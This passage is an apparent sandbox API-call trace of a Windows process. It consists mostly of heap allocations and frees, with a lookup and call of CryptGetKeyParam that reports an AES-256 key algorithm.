(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.885] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0079.886] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0079.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.886] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.887] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0079.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0079.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.887] PeekMessageW (in: lpMsg=0x144dd94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dd94) returned 0 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0079.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0079.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0079.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0079.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0079.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0079.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0079.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0079.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0079.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797108 [0079.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0079.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.893] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0079.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0079.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0079.893] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0079.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0079.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0079.894] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e28f0, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e28f0*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0079.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0079.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0079.894] RtlAllocateHeap 